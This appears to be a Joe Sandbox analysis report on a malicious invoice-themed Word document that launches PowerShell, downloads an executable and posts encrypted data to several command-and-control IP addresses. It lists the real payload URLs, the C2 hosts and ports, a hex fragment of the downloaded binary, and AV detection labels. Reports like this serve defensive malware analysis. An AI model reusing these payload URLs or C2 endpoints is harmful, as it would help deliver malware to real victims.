
Analysis Report

Overview

General Information

Joe Sandbox Version: 22.0.0
Analysis ID: 62468
Start time: 12:29:28
Joe Sandbox Product: CloudBasic
Start date: 04.06.2018
Overall analysis duration: 0h 9m 14s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: INVOICE-ZZIF-145448203429222.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Run name: without instrumentation
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.expl.troj.winDOC@13/8@2/6
HCA Information:
  • Successful, ratio: 96%
  • Number of executed functions: 78
  • Number of non-executed functions: 149
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 26% (good quality ratio 19.2%)
  • Quality average: 50.8%
  • Quality standard deviation: 38.6%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 934
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample HTTP requests are all non-existing; likely the sample is no longer working.
Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis.



Signature Overview



AV Detection:

Antivirus detection for dropped file
Source: C:\Users\Public\276299.exe | Avira: Label: TR/Crypt.Xpack.fgsar
Multi AV Scanner detection for domain / URL
Source: executivevacation.us | virustotal: Detection: 7%
Source: http://149.62.173.247:4143/ | virustotal: Detection: 8%
Source: http://executivevacation.us/BeBk/ | virustotal: Detection: 22%
Source: https://61.19.254.63:443/ | virustotal: Detection: 7%
Source: http://149.202.153.252:4143/ | virustotal: Detection: 8%
Source: http://178.32.255.132:8080/ | virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\276299.exe | virustotal: Detection: 82%
Multi AV Scanner detection for submitted file
Source: INVOICE-ZZIF-145448203429222.doc | virustotal: Detection: 49%
Antivirus detection for unpacked file
Source: 8.2.PartitionClu.exe.3e0000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 7.1.276299.exe.400000.0.unpack | Avira: Label: HEUR/AGEN.1018119
Source: 6.2.276299.exe.400000.1.unpack | Avira: Label: HEUR/AGEN.1018119
Source: 7.2.276299.exe.3e0000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 9.0.PartitionClu.exe.400000.1.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 8.2.PartitionClu.exe.400000.2.unpack | Avira: Label: HEUR/AGEN.1018119
Source: 6.0.276299.exe.400000.3.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 9.0.PartitionClu.exe.400000.0.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 8.2.PartitionClu.exe.3d0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 9.2.PartitionClu.exe.3d0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 7.2.276299.exe.3d0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 9.0.PartitionClu.exe.400000.3.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 8.1.PartitionClu.exe.400000.0.unpack | Avira: Label: HEUR/AGEN.1018119
Source: 7.0.276299.exe.400000.1.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 7.0.276299.exe.400000.0.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 6.2.276299.exe.420000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 7.0.276299.exe.400000.3.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 6.0.276299.exe.400000.2.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 8.0.PartitionClu.exe.400000.0.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 9.2.PartitionClu.exe.3e0000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 7.0.276299.exe.400000.2.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 6.0.276299.exe.400000.1.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 9.1.PartitionClu.exe.400000.0.unpack | Avira: Label: HEUR/AGEN.1018119
Source: 6.2.276299.exe.2d0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 6.0.276299.exe.400000.0.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 9.2.PartitionClu.exe.400000.2.unpack | Avira: Label: HEUR/AGEN.1018119
Source: 9.0.PartitionClu.exe.400000.2.unpack | Avira: Label: TR/Crypt.Xpack.fgsar
Source: 4.1.powershell.exe.51b0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Source: 7.2.276299.exe.400000.2.unpack | Avira: Label: HEUR/AGEN.1018119
Source: 6.1.276299.exe.400000.0.unpack | Avira: Label: HEUR/AGEN.1018119

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E246E CryptGenKey,CryptDestroyKey,CryptReleaseContext,7_2_003E246E
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E25C5 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_003E25C5
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E2417 CryptDecodeObjectEx,CryptReleaseContext,7_2_003E2417
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E2507 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_003E2507
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E265B RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_003E265B
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E23E0 memset,CryptAcquireContextW,7_2_003E23E0
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E248C CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_003E248C
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E2447 CryptImportKey,LocalFree,CryptReleaseContext,7_2_003E2447
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E2588 CryptExportKey,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_003E2588
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E2417 CryptDecodeObjectEx,CryptReleaseContext,9_2_003E2417
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E9200 _snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_003E9200
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E2507 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_003E2507
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E916E memset,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,WaitForSingleObject,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_003E916E
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E23E0 memset,CryptAcquireContextW,9_2_003E23E0
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E246E CryptGenKey,CryptDestroyKey,CryptReleaseContext,9_2_003E246E
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E25C5 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_003E25C5
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E265B RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_003E265B
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E92A0 CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_003E92A0
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E248C CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_003E248C
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E2447 CryptImportKey,LocalFree,CryptReleaseContext,9_2_003E2447
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E2588 CryptExportKey,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_003E2588

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E2447 CryptImportKey,LocalFree,CryptReleaseContext,7_2_003E2447
Source: C:\Windows\System32\PartitionClu.exe | Code function: 9_2_003E2447 CryptImportKey,LocalFree,CryptReleaseContext,9_2_003E2447

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: clients.steadfast.digital
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.3:49173 -> 190.13.146.47:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.3:49171 -> 66.198.240.37:80

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.3:49172 -> 149.202.153.252:4143
Source: global traffic | TCP traffic: 192.168.2.3:49174 -> 178.32.255.132:8080
Source: global traffic | TCP traffic: 192.168.2.3:49175 -> 149.62.173.247:4143
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 4143
Source: unknown | Network traffic detected: HTTP traffic on port 49175 -> 4143
Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Mon, 04 Jun 2018 10:30:13 GMT
  Server: Apache
  X-Powered-By: PHP/7.0.30
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Content-Disposition: attachment; filename="6044.exe"
  Content-Transfer-Encoding: binary
  Content-Length: 110080
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/octet-stream
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 00 00 00 21 64 65 72 6e 33 32 0d 75 6e 00 b4 09 cd 21 b8 01 4c cd 37 ba 10 00 67 21 90 20 62 54 68 72 4c cd 20 75 6e 20 0e 1f ba 0e 65 21 b8 0a 24 4d 5a 90 00 03 00 00 00 72 b4 09 cd 69 01 0e 61 6d 20 6d 75 73 74 90 54 68 69 73 20 70 72 6f 20 57 1f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 03 11 0b 01 00 02 eb cb e1 0b 00 e0 00 00 01 00 00 00 b0 16 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
  GET /BeBk/ HTTP/1.1
  Host: executivevacation.us
  Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 190.13.146.47
Source: Joe Sandbox View | IP Address: 149.62.173.247
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: INFORTELECOM-ASES
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | ASN Name: OVHFR
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 149.202.153.252:4143
  Content-Length: 324
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: a2 01 c6 80 d9 b1 cc 22 af 21 3b b4 63 26 35 76 4b cf 38 4e ec f6 40 4f 2e bd 62 5f d4 38 38 f8 0a d3 f5 c8 03 b4 64 a5 db c5 55 5e 3d ad b9 d5 9f 4a 67 05 c6 59 2f 37 75 d0 c5 7b 29 4a e1 28 8d 4b 35 84 9a 52 90 f8 4f b2 4d 4f 11 43 40 f1 9d 21 80 d3 7b 55 28 1f 08 06 3f 72 ca fb 85 65 c4 55 72 e5 e7 5d 66 49 8d e3 e2 c4 77 a5 84 53 e1 1b 8e fc 8b 81 78 77 8b c7 a6 b5 9b 78 3d aa 14 4f 17 02 57 6d 21 16 77 67 b3 ec 5c f2 e4 09 62 ea 87 8e cc 97 67 a7 1f da 6c 0f 9d 50 a2 90 61 d4 7f ca 7f a2 bd 75 7e 7a e6 76 d9 dd 6f 6f 3b 10 20 02 43 ff c8 60 de d3 e4 04 48 4d 74 96 bf 4a 80 15 71 94 d5 76 e8 22 2c 5e 6c e1 d7 e3 b1 0d 33 cf 33 5f 4f 99 c3 a6 f8 04 6f c5 3b e1 06 6c 39 81 bd a5 bc 6e 04 7e 7b 5b 83 b6 5
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 190.13.146.47:443
  Content-Length: 324
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: a0 8a bd 5e 7f d9 9f ba 51 22 cd e8 13 6b 55 ff d7 2e 81 85 6e 49 a0 59 bd f7 c3 d4 80 30 a6 af 67 be 1b 36 a8 70 7e 19 c8 64 58 5f 19 c9 47 a2 69 1b 4b 8f 05 2a 22 a6 eb ec a1 9e e8 9b 6a 64 eb 18 11 79 01 b8 e6 a4 d6 14 7f 40 ae 94 d5 15 e7 af a2 1b 4b c9 e6 02 da d6 9a a6 82 29 90 c0 c4 55 72 e5 e7 5d 66 49 8d e3 e2 c4 77 a5 84 53 e1 1b 8e fc 8b 81 78 77 8b c7 a6 b5 9b 78 3d aa 14 4f 17 02 57 6d 21 16 77 67 b3 ec 5c f2 e4 09 62 ea 87 8e cc 97 67 a7 1f da 6c 0f 9d 50 a2 90 61 d4 7f ca 7f a2 bd 75 7e 7a e6 76 d9 dd 6f 6f 3b 10 20 02 43 ff c8 60 de d3 e4 04 48 4d 74 96 bf 4a 80 15 71 94 d5 76 e8 22 2c 5e 6c e1 d7 e3 b1 0d 33 cf 33 5f 4f 99 c3 a6 f8 04 6f c5 3b e1 06 6c 39 81 bd a5 bc 6e 04 7e 7b 5b 83 b6 5d f
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 178.32.255.132:8080
  Content-Length: 308
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 34 a5 28 f9 03 d9 dc f9 02 dc d3 1c c2 4b e2 db 1e 8d c4 0f 0e b7 d1 0a 94 c2 9d 70 5d 54 e7 1b 07 c1 7a 29 4b b9 82 52 65 fd 86 b2 21 5d 10 13 60 88 ac 8c 0e 5d ae 37 fc fb c0 55 b5 8c 47 83 36 a3 cb 52 92 c6 6c 91 51 cd e7 d0 a1 99 24 d5 12 f0 9b d0 ec f3 4a 2f 30 d9 de 4a a6 b9 34 be 72 d6 e0 74 bc 03 60 3b 93 36 65 37 36 3e e8 46 d8 71 4a a6 85 5b ad 64 8a 17 9b eb e9 68 ba 7f 8f 0e 12 f9 95 9f 99 34 1a 18 9b df b5 46 6a f2 26 ac 20 8a 14 29 e0 d6 18 34 f6 2c 90 9c 49 25 f2 6e 20 bb 9b 6f fd b7 2f 3d 10 a9 42 e9 8b 9c e6 53 76 73 aa 4c 2d a3 50 cf 37 1d 54 af 30 fa 7a 02 73 4a 28 52 d3 56 87 79 8b e9 39 ab a0 26 eb af e8 34 01 99 24 71 1e 0a 03 0b b7 9b bf e9 b8 c7 85 31 07 4e 22 10 7f 40 77 2e 3e 08 06
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 149.62.173.247:4143
  Content-Length: 308
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 64 6a b9 60 91 a0 a6 9a a4 0d 05 54 43 65 9c f9 28 50 5d 64 3b 91 fe c7 57 f8 64 c8 5c 64 a4 8a 4b 40 63 58 b1 b5 85 81 e7 c3 da 2a 67 9f ac 1e 48 8c 70 fe b3 b7 d2 52 bc e4 49 28 54 7e d9 8f 7d 13 3c 96 51 d6 e8 2d 24 e3 d2 24 1d 38 eb f0 bc 6e 7c b5 ac 93 5f ae a7 7f 79 96 49 63 eb 3f 72 d6 e0 74 bc 03 60 3b 93 36 65 37 36 3e e8 46 d8 71 4a a6 85 5b ad 64 8a 17 9b eb e9 68 ba 7f 8f 0e 12 f9 95 9f 99 34 1a 18 9b df b5 46 6a f2 26 ac 20 8a 14 29 e0 d6 18 34 f6 2c 90 9c 49 25 f2 6e 20 bb 9b 6f fd b7 2f 3d 10 a9 42 e9 8b 9c e6 53 76 73 aa 4c 2d a3 50 cf 37 1d 54 af 30 fa 7a 02 73 4a 28 52 d3 56 87 79 8b e9 39 ab a0 26 eb af e8 34 01 99 24 71 1e 0a 03 0b b7 9b bf e9 b8 c7 85 31 07 4e 22 10 7f 40 77 2e 3e 08 06
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 61.19.254.63:443
  Content-Length: 308
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 02 db d9 97 04 c8 4e 4a 50 8f ff eb 79 36 53 dd ab 65 d2 40 64 93 6b a6 ef a3 6f 42 35 98 c6 19 32 aa 74 2b 2c 94 f0 44 26 62 d5 68 92 ea c6 38 c4 85 e5 d5 aa 0c 4e 2f 28 0b cd 12 fc b5 14 e9 4a f7 16 b0 36 45 b4 07 7e 73 b6 73 ea 15 9c ea 4f 54 05 37 f1 66 60 2e d8 6a 20 a3 56 40 54 b8 72 d6 e0 74 bc 03 60 3b 93 36 65 37 36 3e e8 46 d8 71 4a a6 85 5b ad 64 8a 17 9b eb e9 68 ba 7f 8f 0e 12 f9 95 9f 99 34 1a 18 9b df b5 46 6a f2 26 ac 20 8a 14 29 e0 d6 18 34 f6 2c 90 9c 49 25 f2 6e 20 bb 9b 6f fd b7 2f 3d 10 a9 42 e9 8b 9c e6 53 76 73 aa 4c 2d a3 50 cf 37 1d 54 af 30 fa 7a 02 73 4a 28 52 d3 56 87 79 8b e9 39 ab a0 26 eb af e8 34 01 99 24 71 1e 0a 03 0b b7 9b bf e9 b8 c7 85 31 07 4e 22 10 7f 40 77 2e 3e 08 06 3b
Contains functionality to download additional files from the internet
Source: C:\Users\Public\276299.exe | Code function: 7_2_003E1F79 GetProcessHeap,RtlAllocateHeap,InternetReadFile,InternetReadFile,GetProcessHeap,HeapFree,7_2_003E1F79
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
  GET /BeBk/ HTTP/1.1
  Host: executivevacation.us
  Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: clients.steadfast.digital
Posts data to webserver
Source: unknown | HTTP traffic detected:
  POST / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 149.202.153.252:4143
  Content-Length: 324
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: a2 01 c6 80 d9 b1 cc 22 af 21 3b b4 63 26 35 76 4b cf 38 4e ec f6 40 4f 2e bd 62 5f d4 38 38 f8 0a d3 f5 c8 03 b4 64 a5 db c5 55 5e 3d ad b9 d5 9f 4a 67 05 c6 59 2f 37 75 d0 c5 7b 29 4a e1 28 8d 4b 35 84 9a 52 90 f8 4f b2 4d 4f 11 43 40 f1 9d 21 80 d3 7b 55 28 1f 08 06 3f 72 ca fb 85 65 c4 55 72 e5 e7 5d 66 49 8d e3 e2 c4 77 a5 84 53 e1 1b 8e fc 8b 81 78 77 8b c7 a6 b5 9b 78 3d aa 14 4f 17 02 57 6d 21 16 77 67 b3 ec 5c f2 e4 09 62 ea 87 8e cc 97 67 a7 1f da 6c 0f 9d 50 a2 90 61 d4 7f ca 7f a2 bd 75 7e 7a e6 76 d9 dd 6f 6f 3b 10 20 02 43 ff c8 60 de d3 e4 04 48 4d 74 96 bf 4a 80 15 71 94 d5 76 e8 22 2c 5e 6c e1 d7 e3 b1 0d 33 cf 33 5f 4f 99 c3 a6 f8 04 6f c5 3b e1 06 6c 39 81 bd a5 bc 6e 04 7e 7b 5b 83 b6 5
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Mon, 04 Jun 2018 10:30:55 GMT
  Content-Type: text/html
  Content-Length: 564
  Connection: keep-alive
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65
Urls found in memory or binary data
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmp | String found in binary or memory: Ftp://ns.ado
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: file://
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: file:///
Source: WINWORD.EXE, 00000001.00000002.24914499487.03120000.00000004.sdmp | String found in binary or memory: file:///C:
Source: powershell.exe, 00000004.00000002.24444269014.045AF000.00000004.sdmp | String found in binary or memory: file:///C:/Users/Public/276299.exe
Source: WINWORD.EXE, 00000001.00000002.24907899400.003E4000.00000004.sdmp | String found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/INVOICE-ZZIF-145448203429222.doc
Source: WINWORD.EXE, 00000001.00000002.24907899400.003E4000.00000004.sdmp | String found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/INVOICE-ZZIF-145448203429222.docF
Source: WINWORD.EXE, 00000001.00000002.24907899400.003E4000.00000004.sdmp | String found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/INVOICE-ZZIF-145448203429222.docT
Source: powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: WINWORD.EXE, 00000001.00000003.24901586225.00434000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/System32/cmd.exe
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmp | String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmp | String found in binary or memory: http://
Source: PartitionClu.exe, 00000009.00000002.24910325293.002C4000.00000004.sdmp | String found in binary or memory: http://61.19.254.63:443/
Source: PartitionClu.exe, 00000009.00000002.24910325293.002C4000.00000004.sdmp | String found in binary or memory: http://61.19.254.63:443/)
Source: PartitionClu.exe, 00000009.00000002.24910325293.002C4000.00000004.sdmp | String found in binary or memory: http://61.19.254.63:443/=
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmp | String found in binary or memory: http://V
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://clients
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://clients.steadfast.digit
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://clients.steadfast.digital
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp, powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmp | String found in binary or memory: http://clients.steadfast.digital/BIDORSF/
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://clients.steadfast.digital/BIDORSF/8
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://clients.steadfast.digitalx&
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://clientsX
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://executivevaca
Source: powershell.exe, 00000004.00000002.24441979155.022F9000.00000004.sdmp | String found in binary or memory: http://executivevacation.us
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp | String found in binary or memory: http://executivevacation.us/BeBk/
Source: powershell.exe, 00000004.00000002.24441979155.022F9000.00000004.sdmp | String found in binary or memory: http://executivevacation.usx&
